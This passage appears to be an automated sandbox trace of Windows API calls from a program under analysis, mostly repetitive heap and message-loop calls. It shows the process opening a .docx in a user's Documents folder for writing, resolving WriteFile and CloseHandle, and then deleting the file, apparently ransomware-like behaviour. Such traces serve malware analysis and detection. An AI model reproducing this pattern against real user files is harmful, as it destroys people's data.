lpMsg=0x6ae83c) returned 0 [0037.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.102] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0037.103] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.103] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.103] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.103] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.103] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.103] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0037.103] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.103] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_h6yz.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0037.103] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0037.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0037.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0037.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0037.105] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.105] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.105] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.105] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0037.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.105] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.105] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.105] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.105] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0037.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0037.106] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.106] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.106] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.106] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.106] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0037.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.107] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.107] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.107] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.107] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0037.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0037.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0037.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0037.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0037.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.107] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.108] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.108] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.108] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx", lpFilePart=0x0) returned 0x32 [0037.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.108] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4be5b000, ftCreationTime.dwHighDateTime=0x1d55664, ftLastAccessTime.dwLowDateTime=0x68a94680, ftLastAccessTime.dwHighDateTime=0x1d5b5e5, ftLastWriteTime.dwLowDateTime=0x15d3eba0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x11955, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="_H6YZ.docx", cAlternateFileName="_H6YZ~1.DOC")) returned 0x7c2100 [0037.108] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_H6YZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_h6yz.docx")) returned 1 [0037.109] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4be5b000, ftCreationTime.dwHighDateTime=0x1d55664, ftLastAccessTime.dwLowDateTime=0x68a94680, ftLastAccessTime.dwHighDateTime=0x1d5b5e5, ftLastWriteTime.dwLowDateTime=0x15d3eba0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x11955, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="_H6YZ.docx", cAlternateFileName="_H6YZ~1.DOC")) returned 0 [0037.109] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0037.110] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0037.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0037.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0037.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0037.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0037.111] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0037.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0037.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0037.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0037.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0037.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.111] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0037.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.111] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.111] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4b8 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca48 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.112] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 